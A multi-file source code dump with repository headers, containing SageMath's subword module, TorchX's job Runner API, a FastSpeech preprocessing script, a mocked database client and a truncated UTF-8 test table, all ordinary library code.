'--emulator-window',
action='store_true',
default=False,
help='Enable graphical window display on the emulator.')
def main():
devil_chromium.Initialize()
usage = '%(prog)s --product={' + ','.join(PRODUCTS) + '} ...'
product_parser = argparse.ArgumentParser(
add_help=False, prog='run_android_wpt.py', usage=usage)
product_parser.add_argument(
'--product', action='store', required=True, choices=PRODUCTS)
add_emulator_args(product_parser)
args, _ = product_parser.parse_known_args()
product = args.product
with get_device(args) as device:
if not device:
logger.error('There are no devices attached to this host. Exiting...')
return
adapter = _get_adapter(product, device)
if adapter.options.verbose:
if adapter.options.verbose == 1:
logger.setLevel(logging.INFO)
else:
logger.setLevel(logging.DEBUG)
# WPT setup for chrome and webview requires that PATH contains adb.
platform_tools_path = os.path.dirname(devil_env.config.FetchPath('adb'))
os.environ['PATH'] = ':'.join([platform_tools_path] +
os.environ['PATH'].split(':'))
return adapter.run_test()
if __name__ == '__main__':
# Conform minimally to the protocol defined by ScriptTest.
if 'compile_targets' in sys.argv:
funcs = {
'run': None,
'compile_targets': main_compile_targets,
}
sys.exit(common.run_script(sys.argv[1:], funcs))
logging.basicConfig(level=logging.WARNING)
logger = logging.getLogger()
sys.exit(main())
|
contrib/tools/python/src/Lib/plat-mac/Carbon/Qdoffs.py | HeyLey/catboost | 6,989 | 75216 |
<reponame>HeyLey/catboost
from _Qdoffs import *
|
src/sage/combinat/subword.py | hsm207/sage | 1,742 | 75223 |
<filename>src/sage/combinat/subword.py
r"""
Subwords
A subword of a word `w` is a word obtained by deleting the letters at some
(non necessarily adjacent) positions in `w`. It is not to be confused with the
notion of factor where one keeps adjacent positions in `w`. Sometimes it is
useful to allow repeated uses of the same letter of `w` in a "generalized"
subword. We call this a subword with repetitions.
For example:
- "bnjr" is a subword of the word "bonjour" but not a factor;
- "njo" is both a factor and a subword of the word "bonjour";
- "nr" is a subword of "bonjour";
- "rn" is not a subword of "bonjour";
- "nnu" is not a subword of "bonjour";
- "nnu" is a subword with repetitions of "bonjour";
A word can be given either as a string, as a list or as a tuple.
As repetitions can occur in the initial word, the subwords of a given word do
not in general form a set, but rather an enumerated multiset!
.. TODO::
- implement subwords with repetitions
- implement the category of EnumeratedMultiset and inherit from it
when needed (i.e. when the initial word has repeated letters)
AUTHORS:
- <NAME>: initial version
- <NAME> (2009/02/06): doc improvements + new methods + bug fixes
"""
#*****************************************************************************
# Copyright (C) 2007 <NAME> <<EMAIL>>,
# 2014 <NAME> <<EMAIL>>,
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
import itertools
from sage.structure.parent import Parent
from sage.categories.finite_enumerated_sets import FiniteEnumeratedSets
import sage.arith.all as arith
import sage.misc.prandom as prandom
from sage.rings.integer import Integer
from sage.sets.finite_enumerated_set import FiniteEnumeratedSet
def _stringification(data):
r"""
TESTS::
sage: from sage.combinat.subword import _stringification
sage: _stringification(['a','b','c'])
'abc'
"""
return ''.join(data)
def Subwords(w, k=None, element_constructor=None):
"""
Return the set of subwords of ``w``.
INPUT:
- ``w`` -- a word (can be a list, a string, a tuple or a word)
- ``k`` -- an optional integer to specify the length of subwords
- ``element_constructor`` -- an optional function that will be used
to build the subwords
EXAMPLES::
sage: S = Subwords(['a','b','c']); S
Subwords of ['a', 'b', 'c']
sage: S.first()
[]
sage: S.last()
['a', 'b', 'c']
sage: S.list()
[[], ['a'], ['b'], ['c'], ['a', 'b'], ['a', 'c'], ['b', 'c'], ['a', 'b', 'c']]
The same example using string, tuple or a word::
sage: S = Subwords('abc'); S
Subwords of 'abc'
sage: S.list()
['', 'a', 'b', 'c', 'ab', 'ac', 'bc', 'abc']
sage: S = Subwords((1,2,3)); S
Subwords of (1, 2, 3)
sage: S.list()
[(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
sage: w = Word([1,2,3])
sage: S = Subwords(w); S
Subwords of word: 123
sage: S.list()
[word: , word: 1, word: 2, word: 3, word: 12, word: 13, word: 23, word: 123]
Using word with specified length::
sage: S = Subwords(['a','b','c'], 2); S
Subwords of ['a', 'b', 'c'] of length 2
sage: S.list()
[['a', 'b'], ['a', 'c'], ['b', 'c']]
An example that uses the ``element_constructor`` argument::
sage: p = Permutation([3,2,1])
sage: Subwords(p, element_constructor=tuple).list()
[(), (3,), (2,), (1,), (3, 2), (3, 1), (2, 1), (3, 2, 1)]
sage: Subwords(p, 2, element_constructor=tuple).list()
[(3, 2), (3, 1), (2, 1)]
"""
if element_constructor is None:
datatype = type(w) # 'datatype' is the type of w
if datatype is list or datatype is tuple:
element_constructor = datatype
elif datatype is str:
element_constructor = _stringification
else:
from sage.combinat.words.words import Words
try:
alphabet = w.parent().alphabet()
element_constructor = Words(alphabet)
except AttributeError:
element_constructor = list
if k is None:
return Subwords_w(w, element_constructor)
if not isinstance(k, (int, Integer)):
raise ValueError("k should be an integer")
if k < 0 or k > len(w):
return FiniteEnumeratedSet([])
return Subwords_wk(w, k, element_constructor)
class Subwords_w(Parent):
r"""
Subwords of a given word.
"""
def __init__(self, w, element_constructor):
"""
TESTS::
sage: TestSuite(Subwords([1,2,3])).run()
sage: TestSuite(Subwords('sage')).run()
"""
Parent.__init__(self, category=FiniteEnumeratedSets())
self._w = w
self._build = element_constructor
def __eq__(self, other):
r"""
Equality test.
TESTS::
sage: Subwords([1,2,3]) == Subwords([1,2,3])
True
sage: Subwords([1,2,3]) == Subwords([1,3,2])
False
"""
return self.__class__ == other.__class__ and self._w == other._w and self._build == other._build
def __ne__(self, other):
r"""
TESTS::
sage: Subwords([1,2,3]) != Subwords([1,2,3])
False
sage: Subwords([1,2,3]) != Subwords([1,3,2])
True
"""
return not self == other
def __reduce__(self):
r"""
Pickle (how to construct back the object).
TESTS::
sage: S = Subwords((1,2,3))
sage: S == loads(dumps(S))
True
sage: S = Subwords('123')
sage: S == loads(dumps(S))
True
sage: S = Subwords(('a',(1,2,3),('a','b'),'ir'))
sage: S == loads(dumps(S))
True
"""
return (Subwords_w, (self._w, self._build))
def __repr__(self):
"""
TESTS::
sage: repr(Subwords([1,2,3])) # indirect doctest
'Subwords of [1, 2, 3]'
"""
return "Subwords of {!r}".format(self._w)
def __contains__(self, w):
"""
TESTS::
sage: [] in Subwords([1,2,3,4,3,4,4])
True
sage: [2,3,3,4] in Subwords([1,2,3,4,3,4,4])
True
sage: [5,5,3] in Subwords([1,3,3,5,4,5,3,5])
True
sage: [3,5,5,3] in Subwords([1,3,3,5,4,5,3,5])
True
sage: [3,5,5,3,4] in Subwords([1,3,3,5,4,5,3,5])
False
sage: [2,3,3,4] in Subwords([1,2,3,4,3,4,4])
True
sage: [2,3,3,1] in Subwords([1,2,3,4,3,4,4])
False
"""
return smallest_positions(self._w, w) is not False
def cardinality(self):
"""
EXAMPLES::
sage: Subwords([1,2,3]).cardinality()
8
"""
return Integer(1) << len(self._w)
def first(self):
"""
EXAMPLES::
sage: Subwords([1,2,3]).first()
[]
sage: Subwords((1,2,3)).first()
()
sage: Subwords('123').first()
''
"""
return self._build([])
def last(self):
"""
EXAMPLES::
sage: Subwords([1,2,3]).last()
[1, 2, 3]
sage: Subwords((1,2,3)).last()
(1, 2, 3)
sage: Subwords('123').last()
'123'
"""
return self._build(self._w)
def random_element(self):
r"""
Return a random subword with uniform law.
EXAMPLES::
sage: S1 = Subwords([1,2,3,2,1,3])
sage: S2 = Subwords([4,6,6,6,7,4,5,5])
sage: for i in range(100):
....: w = S1.random_element()
....: if w in S2:
....: assert(w == [])
sage: for i in range(100):
....: w = S2.random_element()
....: if w in S1:
....: assert(w == [])
"""
return self._build(elt for elt in self._w if prandom.randint(0,1))
def __iter__(self):
r"""
EXAMPLES::
sage: Subwords([1,2,3]).list()
[[], [1], [2], [3], [1, 2], [1, 3], [2, 3], [1, 2, 3]]
sage: Subwords((1,2,3)).list()
[(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
sage: Subwords('123').list()
['', '1', '2', '3', '12', '13', '23', '123']
"""
return itertools.chain(*[ Subwords_wk(self._w,i,self._build)
for i in range(len(self._w)+1) ])
class Subwords_wk(Subwords_w):
r"""
Subwords with fixed length of a given word.
"""
def __init__(self, w, k, element_constructor):
"""
TESTS::
sage: S = Subwords([1,2,3],2)
sage: S == loads(dumps(S))
True
sage: TestSuite(S).run()
"""
Subwords_w.__init__(self, w, element_constructor)
self._k = k
def __eq__(self, other):
r"""
Equality test.
TESTS::
sage: Subwords([1,2,3],2) == Subwords([1,2,3],2)
True
sage: Subwords([1,2,3],2) == Subwords([1,3,2],2)
False
sage: Subwords([1,2,3],2) == Subwords([1,2,3],3)
False
"""
return Subwords_w.__eq__(self, other) and self._k == other._k
def __reduce__(self):
r"""
Pickle (how to construct back the object).
TESTS::
sage: S = Subwords('abc',2)
sage: S == loads(dumps(S))
True
sage: S = Subwords(('a',1,'45',(1,2)))
sage: S == loads(dumps(S))
True
"""
return (Subwords_wk, (self._w, self._k, self._build))
def __repr__(self):
"""
TESTS::
sage: repr(Subwords([1,2,3],2)) # indirect doctest
'Subwords of [1, 2, 3] of length 2'
"""
return "{} of length {}".format(Subwords_w.__repr__(self), self._k)
def __contains__(self, w):
"""
TESTS::
sage: [] in Subwords([1, 3, 3, 5, 4, 5, 3, 5],0)
True
sage: [2,3,3,4] in Subwords([1,2,3,4,3,4,4],4)
True
sage: [2,3,3,4] in Subwords([1,2,3,4,3,4,4],3)
False
sage: [5,5,3] in Subwords([1,3,3,5,4,5,3,5],3)
True
sage: [5,5,3] in Subwords([1,3,3,5,4,5,3,5],4)
False
"""
return len(w) == self._k and Subwords_w.__contains__(self,w)
def cardinality(self):
r"""
Return the number of subwords of ``w`` of length ``k``.
EXAMPLES::
sage: Subwords([1,2,3], 2).cardinality()
3
"""
return arith.binomial(Integer(len(self._w)), self._k)
def first(self):
r"""
EXAMPLES::
sage: Subwords([1,2,3],2).first()
[1, 2]
sage: Subwords([1,2,3],0).first()
[]
sage: Subwords((1,2,3),2).first()
(1, 2)
sage: Subwords((1,2,3),0).first()
()
sage: Subwords('123',2).first()
'12'
sage: Subwords('123',0).first()
''
"""
return self._build(self._w[i] for i in range(self._k))
def last(self):
r"""
EXAMPLES::
sage: Subwords([1,2,3],2).last()
[2, 3]
sage: Subwords([1,2,3],0).last()
[]
sage: Subwords((1,2,3),2).last()
(2, 3)
sage: Subwords((1,2,3),0).last()
()
sage: Subwords('123',2).last()
'23'
sage: Subwords('123',0).last()
''
TESTS::
sage: Subwords('123', 0).last() # trac 10534
''
"""
n = len(self._w)
return self._build(self._w[i] for i in range(n-self._k, n))
def random_element(self):
r"""
Return a random subword of given length with uniform law.
EXAMPLES::
sage: S1 = Subwords([1,2,3,2,1],3)
sage: S2 = Subwords([4,4,5,5,4,5,4,4],3)
sage: for i in range(100):
....: w = S1.random_element()
....: if w in S2:
....: assert(w == [])
sage: for i in range(100):
....: w = S2.random_element()
....: if w in S1:
....: assert(w == [])
"""
sample = prandom.sample(self._w, self._k)
if self._build is list:
return sample
return self._build(sample)
def __iter__(self):
"""
EXAMPLES::
sage: Subwords([1,2,3],2).list()
[[1, 2], [1, 3], [2, 3]]
sage: Subwords([1,2,3],0).list()
[[]]
sage: Subwords((1,2,3),2).list()
[(1, 2), (1, 3), (2, 3)]
sage: Subwords((1,2,3),0).list()
[()]
sage: Subwords('abc',2).list()
['ab', 'ac', 'bc']
sage: Subwords('abc',0).list()
['']
"""
if self._k > len(self._w):
return iter([])
iterator = itertools.combinations(self._w, self._k)
if self._build is tuple:
return iterator
else:
return (self._build(x) for x in iterator)
def smallest_positions(word, subword, pos=0):
"""
Return the smallest positions for which ``subword`` appears as a
subword of ``word``. If ``pos`` is specified, then it returns the positions
of the first appearance of subword starting at ``pos``.
If ``subword`` is not found in ``word``, then return ``False``.
EXAMPLES::
sage: sage.combinat.subword.smallest_positions([1,2,3,4], [2,4])
[1, 3]
sage: sage.combinat.subword.smallest_positions([1,2,3,4,4], [2,4])
[1, 3]
sage: sage.combinat.subword.smallest_positions([1,2,3,3,4,4], [3,4])
[2, 4]
sage: sage.combinat.subword.smallest_positions([1,2,3,3,4,4], [3,4],2)
[2, 4]
sage: sage.combinat.subword.smallest_positions([1,2,3,3,4,4], [3,4],3)
[3, 4]
sage: sage.combinat.subword.smallest_positions([1,2,3,4], [2,3])
[1, 2]
sage: sage.combinat.subword.smallest_positions([1,2,3,4], [5,5])
False
sage: sage.combinat.subword.smallest_positions([1,3,3,4,5],[3,5])
[1, 4]
sage: sage.combinat.subword.smallest_positions([1,3,3,5,4,5,3,5],[3,5,3])
[1, 3, 6]
sage: sage.combinat.subword.smallest_positions([1,3,3,5,4,5,3,5],[3,5,3],2)
[2, 3, 6]
sage: sage.combinat.subword.smallest_positions([1,2,3,4,3,4,4],[2,3,3,1])
False
sage: sage.combinat.subword.smallest_positions([1,3,3,5,4,5,3,5],[3,5,3],3)
False
TESTS:
We check for :trac:`5534`::
sage: w = ["a", "b", "c", "d"]; ww = ["b", "d"]
sage: x = sage.combinat.subword.smallest_positions(w, ww); ww
['b', 'd']
"""
pos -= 1
res = [None] * len(subword)
for i in range(len(subword)):
for j in range(pos + 1, len(word) + 1):
if j == len(word):
return False
if word[j] == subword[i]:
pos = j
break
if pos != j:
return False
res[i] = pos
return res
|
packages/core/minos-microservice-common/minos/common/testing/database/clients.py | minos-framework/minos-python | 247 | 75231 |
from collections.abc import (
AsyncIterator,
)
from typing import (
Any,
)
from ...database import (
DatabaseClient,
)
from .operations import (
MockedDatabaseOperation,
)
class MockedDatabaseClient(DatabaseClient):
"""For testing purposes"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.kwargs = kwargs
self._response = tuple()
async def _reset(self, **kwargs) -> None:
"""For testing purposes"""
self._response = tuple()
async def _execute(self, operation: MockedDatabaseOperation) -> None:
"""For testing purposes"""
self._response = operation.response
async def _fetch_all(self, *args, **kwargs) -> AsyncIterator[Any]:
"""For testing purposes"""
for value in self._response:
yield value
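# Minimal usage sketch (assumed, for illustration; the keyword used to build
# MockedDatabaseOperation is a guess based on the operation.response attribute
# read in _execute above):
#
#   client = MockedDatabaseClient()
#   await client._execute(MockedDatabaseOperation("op", response=(1, 2)))
#   values = [v async for v in client._fetch_all()]  # -> [1, 2]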
|
preprocess.py | lcylcy/FastSpeech | 745 | 75239 |
import torch
import numpy as np
import shutil
import os
from data import ljspeech
import hparams as hp
def preprocess_ljspeech(filename):
in_dir = filename
out_dir = hp.mel_ground_truth
if not os.path.exists(out_dir):
os.makedirs(out_dir, exist_ok=True)
metadata = ljspeech.build_from_path(in_dir, out_dir)
write_metadata(metadata, out_dir)
shutil.move(os.path.join(hp.mel_ground_truth, "train.txt"),
os.path.join("data", "train.txt"))
def write_metadata(metadata, out_dir):
with open(os.path.join(out_dir, 'train.txt'), 'w', encoding='utf-8') as f:
for m in metadata:
f.write(m + '\n')
def main():
path = os.path.join("data", "LJSpeech-1.1")
preprocess_ljspeech(path)
if __name__ == "__main__":
main()
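# Expected layout (assumed from the paths used above):
#   data/LJSpeech-1.1/    raw corpus handed to ljspeech.build_from_path()
#   hp.mel_ground_truth/  output directory for the generated mel ground truth
#   data/train.txt        metadata file moved here for the training stage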
|
torchx/runner/api.py | ldworkin/torchx | 101 | 75241 |
<reponame>ldworkin/torchx
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import json
import logging
import time
from datetime import datetime
from types import TracebackType
from typing import Any, Dict, Iterable, List, Mapping, Optional, Tuple, Type
from pyre_extensions import none_throws
from torchx.runner.events import log_event
from torchx.schedulers import get_schedulers
from torchx.schedulers.api import Scheduler, Stream
from torchx.specs import (
AppDef,
AppDryRunInfo,
AppHandle,
AppStatus,
CfgVal,
SchedulerBackend,
UnknownAppException,
from_function,
make_app_handle,
parse_app_handle,
runopts,
)
from torchx.specs.finder import get_component
logger: logging.Logger = logging.getLogger(__name__)
NONE: str = "<NONE>"
class Runner:
"""
TorchX individual component runner. Has the methods for the user to
act upon ``AppDefs``. The ``Runner`` will cache information about the
launched apps if they were launched locally; otherwise it is up to the
specific scheduler implementation.
"""
def __init__(
self,
name: str,
schedulers: Dict[SchedulerBackend, Scheduler],
component_defaults: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
"""
Creates a new runner instance.
Args:
name: the human readable name for this session. Jobs launched will
inherit this name.
schedulers: a mapping of scheduler backends to the schedulers the runner can use.
"""
self._name: str = name
self._schedulers = schedulers
self._apps: Dict[AppHandle, AppDef] = {}
# component_name -> map of component_fn_param_name -> user-specified default val encoded as str
self._component_defaults: Dict[str, Dict[str, str]] = component_defaults or {}
def __enter__(self) -> "Runner":
return self
def __exit__(
self,
type: Optional[Type[BaseException]],
value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> bool:
# This method returns False so that if an error is raised within the
# ``with`` statement, it is reraised properly
# see: https://docs.python.org/3/reference/compound_stmts.html#with
# see also: torchx/runner/test/api_test.py#test_context_manager_with_error
#
self.close()
return False
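# Typical usage (illustrative sketch; "utils.echo", the "local" scheduler name
# and the get_schedulers() call are assumptions based on the docstrings in this
# file rather than a verified invocation):
#
#   with Runner("my_session", get_schedulers(session_name="my_session")) as runner:
#       handle = runner.run_component("utils.echo", ["--msg", "hello"], "local")
#       print(runner.wait(handle))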
def close(self) -> None:
"""
Closes this runner and frees/cleans up any allocated resources.
Transitively calls the ``close()`` method on all the schedulers.
Once this method is called on the runner, the runner object is deemed
invalid and any methods called on the runner object as well as
the schedulers associated with this runner have undefined behavior.
It is ok to call this method multiple times on the same runner object.
"""
for name, scheduler in self._schedulers.items():
scheduler.close()
def run_component(
self,
component: str,
component_args: List[str],
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppHandle:
"""
Runs a component.
``component`` has the following resolution order(high to low):
* User-registered components. Users can register components via
https://packaging.python.org/specifications/entry-points/. Method looks for
entrypoints in the group ``torchx.components``.
* Builtin components relative to `torchx.components`. The path to the component should
be module name relative to `torchx.components` and function name in a format:
``$module.$function``.
* File-based components in format: ``$FILE_PATH:FUNCTION_NAME``. Both relative and
absolute paths supported.
Usage:
.. code-block:: python
# resolved to torchx.components.distributed.ddp()
runner.run_component("distributed.ddp", ...)
# resolved to my_component() function in ~/home/components.py
runner.run_component("~/home/components.py:my_component", ...)
Returns:
An application handle that is used to call other action APIs on the app
Raises:
ComponentValidationException: if component is invalid.
ComponentNotFoundException: if the ``component_path`` is failed to resolve.
"""
dryrun_info = self.dryrun_component(component, component_args, scheduler, cfg)
return self.schedule(dryrun_info)
def dryrun_component(
self,
component: str,
component_args: List[str],
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppDryRunInfo:
"""
Dryrun version of :py:func:`run_component`. Will not actually run the
component, but just returns what "would" have run.
"""
component_def = get_component(component)
app = from_function(
component_def.fn,
component_args,
self._component_defaults.get(component, None),
)
return self.dryrun(app, scheduler, cfg)
def run(
self,
app: AppDef,
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppHandle:
"""
Runs the given application in the specified mode.
.. note:: sub-classes of ``Runner`` should implement ``schedule`` method
rather than overriding this method directly.
Returns:
An application handle that is used to call other action APIs on the app.
"""
dryrun_info = self.dryrun(app, scheduler, cfg)
return self.schedule(dryrun_info)
def schedule(self, dryrun_info: AppDryRunInfo) -> AppHandle:
"""
Actually runs the application from the given dryrun info.
Useful when one needs to overwrite a parameter in the scheduler
request that is not configurable from one of the object APIs.
.. warning:: Use sparingly since abusing this method to overwrite
many parameters in the raw scheduler request may
lead to your usage of TorchX going out of compliance
in the long term. This method is intended to
unblock the user from experimenting with certain
scheduler-specific features in the short term without
having to wait until TorchX exposes scheduler features
in its APIs.
.. note:: It is recommended that sub-classes of ``Runner`` implement
this method instead of directly implementing the ``run`` method.
Usage:
::
dryrun_info = session.dryrun(app, scheduler="default", cfg=cfg)
# overwrite parameter "foo" to "bar"
dryrun_info.request.foo = "bar"
app_handle = session.submit(dryrun_info)
"""
scheduler = none_throws(dryrun_info._scheduler)
cfg = dryrun_info._cfg
with log_event(
"schedule", scheduler, runcfg=json.dumps(cfg) if cfg else None
) as ctx:
sched = self._scheduler(scheduler)
app_id = sched.schedule(dryrun_info)
app_handle = make_app_handle(scheduler, self._name, app_id)
app = none_throws(dryrun_info._app)
self._apps[app_handle] = app
_, _, app_id = parse_app_handle(app_handle)
ctx._torchx_event.app_id = app_id
return app_handle
def name(self) -> str:
return self._name
def dryrun(
self,
app: AppDef,
scheduler: SchedulerBackend,
cfg: Optional[Mapping[str, CfgVal]] = None,
) -> AppDryRunInfo:
"""
Dry runs an app on the given scheduler with the provided run configs.
Does not actually submit the app but rather returns what would have been
submitted. The returned ``AppDryRunInfo`` is pretty formatted and can
be printed or logged directly.
Usage:
::
dryrun_info = session.dryrun(app, scheduler="local", cfg=cfg)
print(dryrun_info)
"""
# input validation
if not app.roles:
raise ValueError(
f"No roles for app: {app.name}. Did you forget to add roles to AppDef?"
)
for role in app.roles:
if not role.entrypoint:
raise ValueError(
f"No entrypoint for role: {role.name}."
f" Did you forget to call role.runs(entrypoint, args, env)?"
)
if role.num_replicas <= 0:
raise ValueError(
f"Non-positive replicas for role: {role.name}."
f" Did you forget to set role.num_replicas?"
)
cfg = cfg or dict()
with log_event("dryrun", scheduler, runcfg=json.dumps(cfg) if cfg else None):
sched = self._scheduler(scheduler)
sched._validate(app, scheduler)
dryrun_info = sched.submit_dryrun(app, cfg)
dryrun_info._scheduler = scheduler
return dryrun_info
def run_opts(self) -> Dict[str, runopts]:
"""
Returns the ``runopts`` for the supported scheduler backends.
Usage:
::
local_runopts = session.run_opts()["local"]
print(f"local scheduler run options: {local_runopts}")
Returns:
A map of scheduler backend to its ``runopts``
"""
return {
scheduler_backend: scheduler.run_opts()
for scheduler_backend, scheduler in self._schedulers.items()
}
def scheduler_backends(self) -> List[SchedulerBackend]:
"""
Returns a list of all supported scheduler backends.
"""
return list(self._schedulers.keys())
def status(self, app_handle: AppHandle) -> Optional[AppStatus]:
"""
Returns:
The status of the application, or ``None`` if the app does not exist anymore
(e.g. was stopped in the past and removed from the scheduler's backend).
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("status", scheduler_backend, app_id):
desc = scheduler.describe(app_id)
if not desc:
# app does not exist on the scheduler
# remove it from apps cache if it exists
# effectively removes this app from the list() API
self._apps.pop(app_handle, None)
return None
app_status = AppStatus(
desc.state,
desc.num_restarts,
msg=desc.msg,
structured_error_msg=desc.structured_error_msg,
roles=desc.roles_statuses,
)
if app_status:
app_status.ui_url = desc.ui_url
return app_status
def wait(
self, app_handle: AppHandle, wait_interval: float = 10
) -> Optional[AppStatus]:
"""
Block waits (indefinitely) for the application to complete.
Possible implementation:
::
while(True):
app_status = status(app)
if app_status.is_terminal():
return
sleep(10)
Args:
app_handle: the app handle to wait for completion
wait_interval: the minimum interval to wait before polling for status
Returns:
The terminal status of the application, or ``None`` if the app does not exist anymore
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("wait", scheduler_backend, app_id):
while True:
app_status = self.status(app_handle)
if not app_status:
return None
if app_status.is_terminal():
return app_status
else:
time.sleep(wait_interval)
def list(self) -> Dict[AppHandle, AppDef]:
"""
Returns the applications that were run with this session mapped by the app handle.
The persistence of the session is implementation dependent.
"""
with log_event("list"):
app_ids = list(self._apps.keys())
for app_id in app_ids:
self.status(app_id)
return self._apps
def stop(self, app_handle: AppHandle) -> None:
"""
Stops the application, effectively directing the scheduler to cancel
the job. Does nothing if the app does not exist.
.. note:: This method returns as soon as the cancel request has been
submitted to the scheduler. The application will be in a
``RUNNING`` state until the scheduler actually terminates
the job. If the scheduler successfully interrupts the job
and terminates it, the final state will be ``CANCELLED``;
otherwise it will be ``FAILED``.
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(app_handle)
with log_event("stop", scheduler_backend, app_id):
status = self.status(app_handle)
if status is not None and not status.is_terminal():
scheduler.cancel(app_id)
def describe(self, app_handle: AppHandle) -> Optional[AppDef]:
"""
Reconstructs the application (to the best extent) given the app handle.
Note that the reconstructed application may not be the complete app as
it was submitted via the run API. How much of the app can be reconstructed
is scheduler dependent.
Returns:
AppDef or None if the app does not exist anymore or if the
scheduler does not support describing the app handle
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("describe", scheduler_backend, app_id):
# if the app is in the apps list, then short circuit everything and return it
app = self._apps.get(app_handle, None)
if not app:
desc = scheduler.describe(app_id)
if desc:
app = AppDef(name=app_id, roles=desc.roles)
return app
def log_lines(
self,
app_handle: AppHandle,
role_name: str,
k: int = 0,
regex: Optional[str] = None,
since: Optional[datetime] = None,
until: Optional[datetime] = None,
should_tail: bool = False,
streams: Optional[Stream] = None,
) -> Iterable[str]:
"""
Returns an iterator over the log lines of the specified job container.
.. note:: #. ``k`` is the node (host) id NOT the ``rank``.
#. ``since`` and ``until`` need not always be honored (depends on scheduler).
.. warning:: The semantics and guarantees of the returned iterator are highly
scheduler dependent. See ``torchx.specs.api.Scheduler.log_iter``
for the high-level semantics of this log iterator. For this reason
it is HIGHLY DISCOURAGED to use this method for generating output
to pass to downstream functions/dependencies. This method
DOES NOT guarantee that 100% of the log lines are returned.
It is totally valid for this method to return no or partial log lines
if the scheduler has already totally or partially purged log records
for the application.
Usage:
::
app_handle = session.run(app, scheduler="local", cfg={})
print("== trainer node 0 logs ==")
for line in session.log_lines(app_handle, "trainer", k=0):
print(line)
Discouraged anti-pattern:
::
# DO NOT DO THIS!
# parses accuracy metric from log and reports it for this experiment run
accuracy = -1
for line in session.log_lines(app_handle, "trainer", k=0):
if matches_regex(line, "final model_accuracy:[0-9]*"):
accuracy = parse_accuracy(line)
break
report(experiment_name, accuracy)
Args:
app_handle: application handle
role_name: role within the app (e.g. trainer)
k: k-th replica of the role to fetch the logs for
regex: optional regex filter, returns all lines if left empty
since: datetime based start cursor. If left empty begins from the
first log line (start of job).
until: datetime based end cursor. If left empty, follows the log output
until the job completes and all log lines have been consumed.
Returns:
An iterator over the log lines of the k-th replica of the specified role.
Raises:
UnknownAppException: if the app does not exist in the scheduler
"""
scheduler, scheduler_backend, app_id = self._scheduler_app_id(
app_handle, check_session=False
)
with log_event("log_lines", scheduler_backend, app_id):
if not self.status(app_handle):
raise UnknownAppException(app_handle)
log_iter = scheduler.log_iter(
app_id,
role_name,
k,
regex,
since,
until,
should_tail,
streams=streams,
)
return log_iter
def _scheduler(self, scheduler: SchedulerBackend) -> Scheduler:
sched = self._schedulers.get(scheduler)
if not sched:
raise KeyError(
f"Undefined scheduler backend: {scheduler}. Use one of: {self._schedulers.keys()}"
)
return sched
def _scheduler_app_id(
self, app_handle: AppHandle, check_session: bool = True
) -> Tuple[Scheduler, str, str]:
"""
Returns the scheduler and app_id from the app_handle.
Set ``check_session`` to validate that the session name in the app handle
is the same as this session.
Raises:
ValueError: if ``check_session=True`` and the session in the app handle
does not match this session's name
KeyError: if no such scheduler backend exists
"""
scheduler_backend, _, app_id = parse_app_handle(app_handle)
scheduler = self._scheduler(scheduler_backend)
return scheduler, scheduler_backend, app_id
def __repr__(self) -> str:
return f"Runner(name={self._name}, schedulers={self._schedulers}, apps={self._apps})"
def get_runner(
name: Optional[str] = None,
component_defaults: Optional[Dict[str, Dict[str, str]]] = None,
**scheduler_params: Any,
) -> Runner:
"""
Convenience method to construct and get a Runner object. Usage:
.. code-block:: python
with get_runner() as runner:
app_handle = runner.run(component(args), scheduler="kubernetes", cfg=runcfg)
print(runner.status(app_handle))
Alternatively,
.. code-block:: python
runner = get_runner()
try:
app_handle = runner.run(component(args), scheduler="kubernetes", cfg=runcfg)
print(runner.status(app_handle))
finally:
runner.close()
Args:
name: human readable name that will be included as part of all launched
jobs.
scheduler_params: extra arguments that will be passed to the constructor
of all available schedulers.
"""
if not name:
name = "torchx"
schedulers = get_schedulers(session_name=name, **scheduler_params)
return Runner(name, schedulers, component_defaults)
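# --- Usage sketch (added for illustration; not part of the original file) ---
# One plausible end-to-end sequence of the Runner calls defined above. The
# scheduler name "local_cwd" and the name `schedule` for the submit method are
# assumptions (the latter inferred from the log_event label); the AppDef is
# supplied by the caller rather than constructed here.
def _runner_usage_sketch(runner: Runner, app: AppDef, scheduler: SchedulerBackend = "local_cwd") -> None:
    # 1. dryrun: build, but do not submit, the scheduler request for inspection
    dryrun_info = runner.dryrun(app, scheduler, cfg={})
    print(dryrun_info)
    # 2. schedule: submit the previously dry-run request and get an app handle back
    app_handle = runner.schedule(dryrun_info)
    # 3. status / wait: poll once, then block until a terminal state is reached
    print(runner.status(app_handle))
    final_status = runner.wait(app_handle, wait_interval=5)
    print(f"finished with: {final_status}")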
|
test_files/uctable_N.py
|
garrettluu/js-adler32
| 224 |
75259
|
<filename>test_files/uctable_N.py
uctable = [ [ 48 ],
[ 49 ],
[ 50 ],
[ 51 ],
[ 52 ],
[ 53 ],
[ 54 ],
[ 55 ],
[ 56 ],
[ 57 ],
[ 194, 178 ],
[ 194, 179 ],
[ 194, 185 ],
[ 194, 188 ],
[ 194, 189 ],
[ 194, 190 ],
[ 217, 160 ],
[ 217, 161 ],
[ 217, 162 ],
[ 217, 163 ],
[ 217, 164 ],
[ 217, 165 ],
[ 217, 166 ],
[ 217, 167 ],
